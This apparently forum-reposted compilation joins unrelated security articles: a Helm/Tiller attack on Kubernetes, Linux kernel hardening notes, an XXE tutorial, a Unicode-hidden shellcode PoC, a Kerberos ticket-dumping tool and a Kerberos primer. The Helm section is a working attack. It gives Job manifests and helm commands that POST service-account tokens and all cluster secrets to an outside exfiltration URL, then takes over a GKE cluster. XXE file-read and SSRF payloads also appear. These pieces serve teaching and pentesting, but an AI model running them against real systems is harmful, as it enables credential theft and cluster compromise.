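As an aside, the naming scheme above is mechanical, so candidate FQDNs for this kind of service enumeration can be generated with a tiny helper - a sketch (the function name is mine):

```shell
#!/bin/bash
# Sketch: build the kube-dns FQDN for a service,
# following the <svc_name>.<namespace>.svc.cluster.local scheme.
svc_fqdn() {
  local name="$1" namespace="${2:-default}"
  echo "${name}.${namespace}.svc.cluster.local"
}

# Probe a wordlist of interesting service names with getent, as in the post:
# for svc in tiller-deploy kube-dns; do getent hosts "$(svc_fqdn "$svc" kube-system)"; done
```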
Abusing tiller-deploy

The way Helm talks to a Kubernetes cluster is over gRPC to the tiller-deploy pod. The pod then talks to the Kubernetes API with its service account token. When a helm command is run from a client, under the hood a port forward is opened up into the cluster to talk directly to the tiller-deploy service, which always points to the tiller-deploy pod on TCP 44134. This means that a user outside the cluster must have the ability to open port forwards into the cluster, since port 44134 is not externally exposed. From inside the cluster, however, 44134 is available and the port forward is not needed. We can verify that the port is open by simply trying to curl it. Since we didn't get a timeout, something is listening there. curl fails, though, since this endpoint is designed to talk gRPC, not HTTP. Knowing we can reach the port, if we can send the right messages, we can talk directly to Tiller - since by default, Tiller does not require any authentication for gRPC communication. And since in this default install Tiller is running with cluster-admin privileges, we can essentially run cluster admin commands without any authentication.

Talking gRPC to Tiller

All of the gRPC endpoints are defined in the source code in Protobuf format, so anyone can create a client to communicate with the API. But the easiest way to communicate with Tiller is just through the normal Helm client, which is a static binary anyway. On our compromised pod, we can download the helm binary from the official releases. To download and extract to /tmp:

export HVER=v2.11.0 # you may need a different version
curl -L "https://storage.googleapis.com/kubernetes-helm/helm-${HVER}-linux-amd64.tar.gz" | tar xz --strip-components=1 -C /tmp linux-amd64/helm

Note: You may need to download specific versions to match the version running on the server. You'll see error messages telling you what version to get.
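Incidentally, the reachability check described above doesn't require curl at all - bash's /dev/tcp pseudo-device works too, which is handy on stripped-down pod images. A sketch (the helper name is mine):

```shell
#!/bin/bash
# Sketch: test whether a TCP port is reachable using only bash builtins.
# Returns 0 if the connect succeeds, non-zero on refusal or timeout.
port_open() {
  local host="$1" port="$2"
  timeout 3 bash -c "exec 3<>/dev/tcp/${host}/${port}" 2>/dev/null
}

# port_open tiller-deploy.kube-system.svc.cluster.local 44134 && echo "Tiller reachable"
```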
The helm binary allows us to specify a direct address to Tiller with --host or with the HELM_HOST environment variable. By plugging in the discovered tiller-deploy service's FQDN, we can directly communicate with the Tiller pod and run arbitrary Helm commands. For example, we can see our previously installed Wordpress release! From here, we have full control of Tiller. We can do anything a cluster admin could normally do with Helm, including installing/upgrading/deleting releases. But we still can't "directly" talk to the Kubernetes API, so let's abuse Tiller to upgrade our privileges and become full cluster admin.

Stealing secrets with Helm and Tiller

Tiller is configured with a service account that has cluster admin privileges. This means the pod is using a secret, privileged service token to authenticate with the Kubernetes API. Service accounts are generally only used for "non-human" interactions with the k8s API; however, anyone in possession of the secret token can still use it. If an attacker compromises Tiller's service account token, he or she can execute any Kubernetes API call with full admin privileges. Unfortunately, the Helm API doesn't support direct querying of secrets or other resources. Using Helm, we can only create new releases from chart templates. Chart templates are very well documented and allow us to template out custom resources to deploy to Kubernetes, so we just need to craft a resource in a way that exfiltrates the secret(s) we want.

Stealing a service account token

When the service account name is known, stealing its token is fairly straightforward. All that is needed is to launch a pod with that service account, then read the value from /var/run/secrets/kubernetes.io/serviceaccount/token, where the token value gets mounted at creation.
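Inside any pod running with the target service account, grabbing that mounted token really is a one-liner. A sketch (the default path is the standard Kubernetes mount location; the helper name and the directory override are mine, added for illustration):

```shell
#!/bin/bash
# Sketch: read a pod's mounted service account token. Kubernetes mounts it
# under /var/run/secrets/kubernetes.io/serviceaccount by default.
read_sa_token() {
  local dir="${1:-/var/run/secrets/kubernetes.io/serviceaccount}"
  cat "$dir/token"
}

# Exfiltration is then just: curl -d "$(read_sa_token)" "$EXFIL_URL"
```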
It's possible to just define a job that reads the value and uses curl to POST it to a listening URL:

apiVersion: batch/v1
kind: Job
metadata:
  name: tiller-deployer # something benign looking
  namespace: kube-system
spec:
  template:
    spec:
      serviceAccountName: tiller # hardcoded service account name
      containers:
      - name: tiller-deployer # something benign looking
        image: byrnedo/alpine-curl
        command: ["curl"]
        args: ["-d", "@/var/run/secrets/kubernetes.io/serviceaccount/token", "$(EXFIL_URL)"]
        env:
        - name: EXFIL_URL
          value: "https://<listening_url>" # replace URL here
      restartPolicy: Never
  backoffLimit: 5

Of course, since we don't have access to the Kubernetes API directly and are using Helm, we can't just send this YAML - we have to send a Chart. I've created a chart to run the above job: https://github.com/ropnop/pentest_charts/tree/master/charts/exfil_sa_token

This chart is also packaged up and served from a Chart Repo here: https://ropnop.github.io/pentest_charts/

This Chart takes a few values:

- name - the name of the release, job and pod. Probably best to call it something benign looking (e.g. "tiller-deployer")
- serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
- exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it!
(I like using a serverless function to dump to Slack)

- namespace - defaults to kube-system, but you can override it

To deploy this chart and exfil the tiller service account token, we first have to "initialize" Helm in our pod:

$ export HELM_HOME=/tmp/helmhome
$ /tmp/helm init --client-only

Once it initializes, we can deploy the chart directly and pass it the values via the command line:

$ export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134
$ /tmp/helm install --name tiller-deployer \
    --set serviceAccountName=tiller \
    --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" \
    --repo https://ropnop.github.io/pentest_charts exfil_sa_token

Our Job was successfully deployed, and I got the tiller service account token POSTed back to me in Slack. After the job completes, it's easy to clean everything up and delete all the resources with a Helm purge:

$ /tmp/helm delete --purge tiller-deployer

Stealing all secrets from Kubernetes

While you can always use the "exfil_sa_token" chart to steal service account tokens, it's predicated on one thing: you know the name of the service account. In the above case, an attacker would pretty much have to guess that the service account name was "tiller", or the attack wouldn't work. In this scenario, since we don't have access to the Kubernetes API to query service accounts, and we can't look it up through Tiller, there's no easy way to pull out a service account token if it has a unique name. The other option we have, though, is to use Helm to create a new, highly privileged service account, and then use that to extract all the other Kubernetes secrets. To accomplish that, we create a new ServiceAccount and ClusterRoleBinding, then attach them to a new job that extracts all Kubernetes secrets via the API.
The YAML definitions to do that would look something like this:

---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: tiller-deployer # benign looking service account
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: tiller-deployer
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin # full cluster-admin privileges
subjects:
- kind: ServiceAccount
  name: tiller-deployer
  namespace: kube-system
---
apiVersion: batch/v1
kind: Job
metadata:
  name: tiller-deployer # something benign looking
  namespace: kube-system
spec:
  template:
    spec:
      serviceAccountName: tiller-deployer # newly created service account
      containers:
      - name: tiller-deployer # something benign looking
        image: rflathers/kubectl:bash # alpine+curl+kubectl+bash
        command:
        - "/bin/bash"
        - "-c"
        - "curl --data-binary @<(kubectl get secrets --all-namespaces -o json) $(EXFIL_URL)"
        env:
        - name: EXFIL_URL
          value: "https://<listening_url>" # replace URL here
      restartPolicy: Never

In the same vein as above, I packaged these resources into a Helm chart: https://github.com/ropnop/pentest_charts/tree/master/charts/exfil_secrets

This Chart also takes the same values:

- name - the name of the release, job and pod. Probably best to call it something benign looking (e.g. "tiller-deployer")
- serviceAccountName - the name of the cluster-admin service account to create and use (again, use something innocuous looking)
- exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function to dump to Slack)
- namespace - defaults to kube-system, but you can override it

When this chart is installed, it will create a new cluster-admin service account, then launch a job using that service account to query every secret in all namespaces and dump that data in a POST body back to EXFIL_URL.
Just like above, we can launch this from our compromised pod:

$ export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134
$ export HELM_HOME=/tmp/helmhome
$ /tmp/helm init --client-only
$ /tmp/helm install --name tiller-deployer \
    --set serviceAccountName="tiller-deployer" \
    --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" \
    --repo https://ropnop.github.io/pentest_charts exfil_secrets

After Helm installs the chart, we'll get every Kubernetes secret dumped back to our exfil URL (in my case posted in Slack). Then make sure to clean up and remove the new service account and job:

$ /tmp/helm delete --purge tiller-deployer

With the secrets in JSON form, you can use jq to extract plaintext passwords, tokens and certificates:

cat all_secrets.json | jq '[.items[] | . as $secret | .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]'

Searching through that output, you can find the service account token Tiller uses.

Using service account tokens

Now armed with Tiller's service account token, we can finally talk directly to the Kubernetes API from within our compromised pod. The token value needs to be added as a header in the request: Authorization: Bearer <token_here>

$ export TOKEN="eyJhb...etc..."
$ curl -k -H "Authorization: Bearer $TOKEN" https://10.7.240.1:443/

Working from within the cluster is annoying, though, since it always requires us to execute commands from our compromised pod. Since this is a GKE cluster, we should be able to access the Kubernetes API over the internet if we find the correct endpoint.
For GKE, you can pull data about the Kubernetes cluster (including the master endpoint) from the Google Cloud metadata API on the compromised pod:

$ curl -s -kH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | grep KUBERNETES_MASTER_NAME
KUBERNETES_MASTER_NAME: 104.154.18.15

Armed with the IP address and Tiller's token, you can then configure kubectl from anywhere to talk to the GKE cluster on that endpoint:

$ kubectl config set-cluster pwnedgke --server=https://104.154.18.15
$ kubectl config set-credentials tiller --token=$TILLER_TOKEN
$ kubectl config set-context pwnedgke --cluster pwnedgke --user tiller
$ kubectl config use-context pwnedgke
$ kubectl --insecure-skip-tls-verify cluster-info

Note: I'm skipping TLS verification because I didn't configure the cluster certificate.

For example, let's take over the GKE cluster from Kali. And that's it - we have full admin control over this GKE cluster. There is a ton more we can do to maintain persistence (especially after dumping all the secrets previously), but that will remain a topic for future posts.

Defenses

This entire scenario was created to demonstrate how the "default" installation of Helm and Tiller (as well as GKE) can make it really easy for an attacker to escalate privileges and take over the entire cluster if a pod is compromised. If you are considering using Helm and Tiller in production, I strongly recommend following everything outlined here: https://github.com/helm/helm/blob/master/docs/securing_installation.md

mTLS should be configured for Tiller, and RBAC should be locked down as much as possible. Or don't create a Tiller service and require admins to do manual port forwards to the pod. Or ask yourself if you really need Tiller at all - I have seen more and more organizations simply abandon Tiller altogether and just use Helm client-side for templating.
For GKE, Google has a good writeup as well on securing a cluster for production: https://cloud.google.com/solutions/prep-kubernetes-engine-for-prod. Using VPCs, locking down access, filtering metadata, and enforcing network policies should be done at a minimum. Sadly, a lot of these security controls are hard to implement, and require a lot more effort and research to get right. It's not surprising to me then that a lot of default installations still make their way to production. Hope this helps someone! Let me know if you have any questions or want me to focus on anything more in the future. I'm hoping this is just the first of several Kubernetes related posts. -ropnop Sursa: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/
-
HUMBLE BOOK BUNDLE: HACKING 2.0 BY NO STARCH PRESS A great way to strengthen your computer skills is to learn what's going on underneath. Let No Starch Press be your guide with this book bundle! $475 WORTH OF AWESOME STUFF PAY $1 OR MORE DRM-FREE MULTI-FORMAT 19,130 BUNDLES SOLD Sursa: https://www.humblebundle.com/books/hacking-no-starch-press-books
-
May 27, 2019

security things in Linux v5.1

Filed under: Blogging, Chrome OS, Debian, Kernel, Security, Ubuntu, Ubuntu-Server — kees @ 8:49 pm

Previously: v5.0. Linux kernel v5.1 has been released! Here are some security-related things that stood out to me:

introduction of pidfd

Christian Brauner landed the first portion of his work to remove pid races from the kernel: using a file descriptor to reference a process ("pidfd"). Now /proc/$pid can be opened and used as an argument for sending signals with the new pidfd_send_signal() syscall. This handle will only refer to the original process at the time the open() happened, and not to any later "reused" pid if the process dies and a new process is assigned the same pid. Using this method, it's now possible to racelessly send signals to exactly the intended process without having to worry about pid reuse. (BTW, this commit wins the 2019 award for Most Well Documented Commit Log Justification.)

explicitly test for userspace mappings of heap memory

During the Linux Conf AU 2019 Kernel Hardening BoF, Matthew Wilcox noted that there wasn't anything in the kernel actually sanity-checking when userspace mappings were being applied to kernel heap memory (which would allow attackers to bypass the copy_{to,from}_user() infrastructure). Driver bugs or attackers able to confuse mappings wouldn't get caught, so he added checks. To quote the commit logs: "It's never appropriate to map a page allocated by SLAB into userspace" and "Pages which use page_type must never be mapped to userspace as it would destroy their page type". The latter check almost immediately caught a bad case, which was quickly fixed to avoid page type corruption.

LSM stacking: shared security blobs

Casey Schaufler has landed one of the major pieces of getting multiple Linux Security Modules (LSMs) running at the same time (called "stacking"). It is now possible for LSMs to share the security-specific storage "blobs" associated with various core structures (e.g.
inodes, tasks, etc) that LSMs can use for saving their state (e.g. storing which profile a given task is confined under). The kernel originally gave only the single active “major” LSM (e.g. SELinux, AppArmor, etc) full control over the entire blob of storage. With “shared” security blobs, the LSM infrastructure does the allocation and management of the memory, and LSMs use an offset for reading/writing their portion of it. This unblocks the way for “medium sized” LSMs (like SARA and Landlock) to get stacked with a “major” LSM as they need to store much more state than the “minor” LSMs (e.g. Yama, LoadPin) which could already stack because they didn’t need blob storage.

SafeSetID LSM

Micah Morton added the new SafeSetID LSM, which provides a way to narrow the power associated with the CAP_SETUID capability. Normally a process with CAP_SETUID can become any user on the system, including root, which makes it a meaningless capability to hand out to non-root users in order for them to “drop privileges” to some less powerful user. There are trees of processes under Chrome OS that need to operate under different user IDs and other methods of accomplishing these transitions safely weren’t sufficient. Instead, this provides a way to create a system-wide policy for user ID transitions via setuid() (and group transitions via setgid()) when a process has the CAP_SETUID capability, making it a much more useful capability to hand out to non-root processes that need to make uid or gid transitions.

ongoing: refcount_t conversions

Elena Reshetova continued landing more refcount_t conversions in core kernel code (e.g. scheduler, futex, perf), with an additional conversion in btrfs from Anand Jain. The existing conversions, mainly when combined with syzkaller, continue to show their utility at finding bugs all over the kernel.

ongoing: implicit fall-through removal

Gustavo A. R. Silva continued to make progress on marking more implicit fall-through cases.
What’s so impressive to me about this work, like refcount_t, is how many bugs it has been finding (see all the “missing break” patches). It really shows how quickly the kernel benefits from adding -Wimplicit-fallthrough to keep this class of bug from ever returning.

stack variable initialization includes scalars

The structleak gcc plugin (originally ported from PaX) had its “by reference” coverage improved to initialize scalar types as well (making “structleak” a bit of a misnomer: it now stops leaks from more than structs). Barring compiler bugs, this means that all stack variables in the kernel can be initialized before use at function entry. For variables not passed to functions by reference, the -Wuninitialized compiler flag (enabled via -Wall) already makes sure the kernel isn’t building with local-only uninitialized stack variables. And now with CONFIG_GCC_PLUGIN_STRUCTLEAK_BYREF_ALL enabled, all variables passed by reference will be initialized as well. This should eliminate most, if not all, uninitialized stack flaws with very minimal performance cost (for most workloads it is lost in the noise), though it does not have the stack data lifetime reduction benefits of GCC_PLUGIN_STACKLEAK, which wipes the stack at syscall exit. Clang has recently gained similar automatic stack initialization support, and I’d love to see this feature in native gcc. To evaluate the coverage of the various stack auto-initialization features, I also wrote regression tests in lib/test_stackinit.c.

That’s it for now; please let me know if I missed anything. The v5.2 kernel development cycle is off and running already.

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

Sursa: https://outflux.net/blog/archives/2019/05/27/security-things-in-linux-v5-1/
-
Common API security pitfalls

This page contains the resources for the talk titled "Common API security pitfalls". A recording is available at the bottom. DOWNLOAD SLIDES

Abstract

The shift towards an API landscape indicates a significant evolution in the way we build applications. The rise of JavaScript and mobile applications has sparked an explosion of easily-accessible REST APIs. But how do you protect access to your API? Which security aspects are no longer relevant? Which security features are an absolute must-have, and which additional security measures do you need to take into account? These are hard questions, as evidenced by the deployment of numerous insecure APIs. Attend this session to find out about common API security pitfalls that often result in compromised user accounts and unauthorized access to your data. We expose the problem that lies at the root of each of these pitfalls, and offer actionable advice to address these security problems. After this session, you will know how to assess the security of your APIs, and the best practices to improve them towards the future.

About Philippe De Ryck

Philippe De Ryck is the founder of Pragmatic Web Security, where he travels the world to train developers on web security and security engineering. He holds a Ph.D. in web security from KU Leuven. Google recognizes Philippe as a Google Developer Expert for his knowledge of web security and security in Angular applications.

Sursa: https://pragmaticwebsecurity.com/talks/commonapisecuritypitfalls
-
XML external entity (XXE) injection

In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.

What is XML external entity injection?

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access. In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

How do XXE vulnerabilities arise?

Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.

Read more: Learn about the XML format, DTDs, and external entities

XML external entities are a type of custom XML entity whose defined values are loaded from outside of the DTD in which they are declared. External entities are particularly interesting from a security perspective because they allow an entity to be defined based on the contents of a file path or URL.

What are the types of XXE attacks?

There are various types of XXE attacks:

Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, and returned in the application's response.
Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.
Exploiting blind XXE to exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.
Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.

Exploiting XXE to retrieve files

To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways:

Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.
Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>

The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application's response to include the contents of the file:

Invalid product ID:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Note: With real-world XXE vulnerabilities, there will often be a large number of data values within the submitted XML, any one of which might be used within the application's response.
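Payloads like the one above follow a fixed template, so generating them for different target files is trivial. Here is a small Python sketch; the helper name is mine, while the stockCheck/productId structure is taken from the example:

```python
def build_xxe_payload(target_file: str) -> str:
    """Build the file-retrieval payload shown above for any target file."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://{target_file}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId></stockCheck>"
    )

print(build_xxe_payload("/etc/passwd"))
print(build_xxe_payload("/etc/hostname"))
```

In a real test you would substitute whichever data value is echoed back in the application's response in place of productId.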
To test systematically for XXE vulnerabilities, you will generally need to test each data node in the XML individually, by making use of your defined entity and seeing whether it appears within the response.

LAB: Exploiting XXE using external entities to retrieve files

Exploiting XXE to perform SSRF attacks

Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform server-side request forgery (SSRF). This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access. To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response, and so gain two-way interaction with the backend system. If not, then you will only be able to perform blind SSRF attacks (which can still have critical consequences). In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>

LAB: Exploiting XXE to perform SSRF attacks

Blind XXE vulnerabilities

Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible. Blind XXE vulnerabilities can still be detected and exploited, but more advanced techniques are required. You can sometimes use out-of-band techniques to find vulnerabilities and exploit them to exfiltrate data.
And you can sometimes trigger XML parsing errors that lead to disclosure of sensitive data within error messages.

Read more: Finding and exploiting blind XXE vulnerabilities

Finding hidden attack surface for XXE injection

Attack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML.

XInclude attacks

Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a backend SOAP request, which is then processed by the backend SOAP service. In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document. To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

LAB: Exploiting XInclude to retrieve files

XXE attacks via file upload

Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG.
For example, an application might allow users to upload images, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.

LAB: Exploiting XXE via image file upload

XXE attacks via modified content type

Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML. For example, if a normal request contains the following:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar

Then you might be able to submit the following request, with the same result:

POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format.

How to find and test for XXE vulnerabilities

The vast majority of XXE vulnerabilities can be found quickly and reliably using Burp Suite's web vulnerability scanner. Manually testing for XXE vulnerabilities generally involves:

Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response.
Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose.
Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.

How to prevent XXE vulnerabilities

Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features. Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.

Sursa: https://portswigger.net/web-security/xxe
-
PoC: Encoding Shellcode Into Invisible Unicode Characters

Malware has been using unicode for a long time to hide / obfuscate urls, filenames, scripts, etc... The Right-to-Left Override character (e2 80 ae) is a classic. In this post a PoC is shared, where a shellcode is hidden / encoded into a string in a python script (this would probably work with other languages too), with invisible unicode characters that will not be displayed by most text editors.

The idea is quite simple. We will choose three "invisible" unicode characters:

e2 80 8b : bit 0
e2 80 8c : bit 1
e2 80 8d : delimiter

With this, and having a potentially malicious script, we can encode the malicious script, bit by bit, into these unicode characters:

(delimiter e2 80 8d) .....encoded script (bit 0 to e2 80 8b, bit 1 to e2 80 8c)...... (delimiter e2 80 8d)

I have used this simple script to encode the malicious script: https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/encode.py

Now, we can embed these encoded "invisible" unicode chars into a string. The following source code looks like a simple hello world: https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/helloworld.py

However, if you download and open the file with a hexadecimal editor you can see all the encoded information that is part of the hello world string. Most of the text editors that I tested didn't display the unicode characters: Visual Studio, Geany, Sublime, Notepad, browsers, etc...
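The three-character scheme described above fits in a few lines of Python. This is my own minimal reimplementation of the idea, not the linked encode.py; U+200B, U+200C and U+200D are the code points behind the UTF-8 sequences e2 80 8b / 8c / 8d mentioned in the post:

```python
# The three invisible characters from the post (UTF-8: e2 80 8b/8c/8d).
ZW_BIT0 = "\u200b"   # ZERO WIDTH SPACE      -> bit 0
ZW_BIT1 = "\u200c"   # ZERO WIDTH NON-JOINER -> bit 1
ZW_DELIM = "\u200d"  # ZERO WIDTH JOINER     -> payload delimiter

def encode(payload: bytes) -> str:
    """Turn a payload into a run of invisible characters."""
    bits = "".join(f"{byte:08b}" for byte in payload)
    body = "".join(ZW_BIT1 if bit == "1" else ZW_BIT0 for bit in bits)
    return ZW_DELIM + body + ZW_DELIM

def decode(carrier: str) -> bytes:
    """Recover the payload hidden between the delimiters."""
    hidden = carrier.split(ZW_DELIM)[1]
    bits = "".join("1" if ch == ZW_BIT1 else "0"
                   for ch in hidden if ch in (ZW_BIT0, ZW_BIT1))
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))

# A "hello world" string that secretly carries a second script.
stego = "Hello " + encode(b"print('calc')") + "world!"
print(stego)  # renders as just: Hello world!
assert decode(stego) == b"print('calc')"
```

The decoded bytes could then be handed to eval/exec (as the PoC does), which is exactly why such strings deserve a look in a hex editor.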
The following script decodes and executes a secondary potentially malicious python script (the PoC script only executes calc) from invisible unicode characters: https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious.py

And the following script decodes a x64 shellcode (the shellcode executes calc) from invisible unicode characters, then it loads the shellcode with VirtualAlloc+WriteProtectMemory, and calls CreateThread to execute it: https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious2_x64_shellcode.py

The previous scripts are quite obvious and suspicious, but if this encoded malicious script and these lines are mixed into a longer and more complicated source code, it would probably be harder to notice that the script contains malicious code. So, careful when you download your favorite exploits! I have not tested it, but this will probably work with other languages. Visual Studio, for example, doesn't show these characters in a C source file.

Posted by vallejocc at 2:47 AM

Sursa: http://www.vallejo.cc/2019/05/poc-encrypting-malicious-script-into.html
-
Tickey

Tool to extract Kerberos tickets from Linux kernel keys. Based on the paper Kerberos Credential Thievery (GNU/Linux).

Building

git clone https://github.com/TarlogicSecurity/tickey
cd tickey/tickey
make CONF=Release

After that, the binary should be in dist/Release/GNU-Linux/.

Execution

Arguments:
-i => To perform process injection if it is needed
-s => To not print in output (for injection)

Important: when injecting into another process, tickey performs an execve syscall which invokes its own binary from the context of another user. Therefore, to perform a successful injection, the binary must be in a folder to which all users have access, like /tmp.

Execution example:

[root@Lab-LSV01 /]# /tmp/tickey -i
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
[+] root detected, so... DUMP ALL THE TICKETS!!
[*] Trying to inject in tarlogic[1000] session...
[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache
[*] Trying to inject in velociraptor[1120601115] session...
[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache
[*] Trying to inject in trex[1120601113] session...
[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache
[X] [uid:0] Error retrieving tickets

License

This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see https://www.gnu.org/licenses/.
Author

Eloy Pérez González @Zer1t0 at @Tarlogic - https://www.tarlogic.com/en/

Acknowledgment

Thanks to @TheXC3LL for his support with the binary injection.

Sursa: https://github.com/TarlogicSecurity/tickey
-
Kerberos (I): How does Kerberos work? – Theory

20 - MAR - 2019 - ELOY PÉREZ

The objective of this series of posts is to clarify how Kerberos works, rather than just introduce the attacks. This is because on many occasions it is not clear why some techniques work and others do not, and having this knowledge allows you to know when to use each of those attacks in a pentest. Therefore, after a long journey of diving into the documentation and several posts about the topic, we’ve tried to write in this post all the important details which an auditor should know in order to understand how to take advantage of the Kerberos protocol. In this first post only basic functionality will be discussed. Later posts will show how to perform the attacks and how the more complex aspects, such as delegation, work. If anything about the topic is not well explained, do not be afraid to leave a comment or question about it. Now, onto the topic.

What is Kerberos?

Firstly, Kerberos is an authentication protocol, not an authorization protocol. In other words, it allows each user, who provides a secret password, to be identified; however, it does not validate which resources or services this user can access. Kerberos is used in Active Directory. On this platform, Kerberos provides information about the privileges of each user, but it is the responsibility of each service to determine whether the user has access to its resources.

Kerberos items

In this section several components of the Kerberos environment will be examined.

Transport layer

Kerberos uses either UDP or TCP as transport protocol, both of which send data in cleartext. Because of this, Kerberos is responsible for providing encryption. The ports used by Kerberos are UDP/88 and TCP/88, which should be listening on the KDC (explained in the next section).

Agents

Several agents work together to provide authentication in Kerberos. These are the following:

Client or user who wants to access the service.
AP (Application Server) which offers the service required by the user.
KDC (Key Distribution Center), the main service of Kerberos, responsible for issuing the tickets, installed on the DC (Domain Controller). It is supported by the AS (Authentication Service), which issues the TGTs.

Encryption keys

